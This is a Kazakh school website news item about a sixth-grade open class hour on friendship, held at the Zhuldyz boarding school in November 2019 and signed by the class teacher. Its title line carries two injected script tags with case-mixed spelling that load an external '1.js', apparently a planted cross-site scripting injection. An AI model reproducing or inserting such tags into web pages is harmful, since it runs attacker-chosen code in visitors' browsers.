Ашық тәрбие сағаты «Достық – қымбат өмірде»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2019

«Жұлдыз»  орта мектеп –интернатының  мемлекеттік тілде оқитын 6 – сынып оқушыларында дүйсенбі 18- қараша күні ашық тәрбие сағаты өтті. Сабақтың тақырыбы: «Достық – қымбат өмірде». Ашық тәрбие сағатының мақсаты: балаларға достықты қадірлей білуге және бір – біріне әрдайым қиын сәттерде көмектесуге тәрбиелеу болды. Сабақта барлық оқушылар білімдері мен өнерлерін көрсетті: ән айтып, өлең оқыды, ашықхат жасап бір –біріне шын жүректен  тілектерін білдірді.  Сабақ «Шаңырақ жаттығуымен» аяқталды. «Шаңырақ жаттығуының» мақсаты – оқушыларды бір шаңырақтың астында жинап бірлікке, достыққа, ынтымақтастыққа шақырып,  шаңырақты көтеру болды.  Сабақ соңында белсенді жұмыс орындағандары үшін  мақтау қағаздарымен марапатталды.

                                                        Сынып жетекшісі Кудиярова Аймара Баглановна

Просмотров: 726


Пікір қосу



Деректерді қолтаңбаға қосу